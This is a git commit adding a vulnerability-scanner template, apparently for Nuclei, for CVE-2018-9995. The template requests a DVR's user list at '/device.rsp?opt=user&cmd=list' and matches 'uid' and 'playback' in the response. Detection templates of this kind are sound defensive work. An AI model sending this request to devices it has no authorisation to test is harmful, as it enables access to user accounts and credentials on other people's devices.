Create CVE-2018-9995.yaml
parent
8b88157c81
commit
578ec0bac1
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2018-9995
|
||||
info:
|
||||
name: DVR Authentication Bypass
|
||||
author: princechaddha
|
||||
severity: high
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-9995
|
||||
tags: cve,cve2018,auth-bypass
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/device.rsp?opt=user&cmd=list"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "\"uid\":"
|
||||
- "playback"
|
||||
condition: and
|
||||
part: body
|
Loading…
Reference in New Issue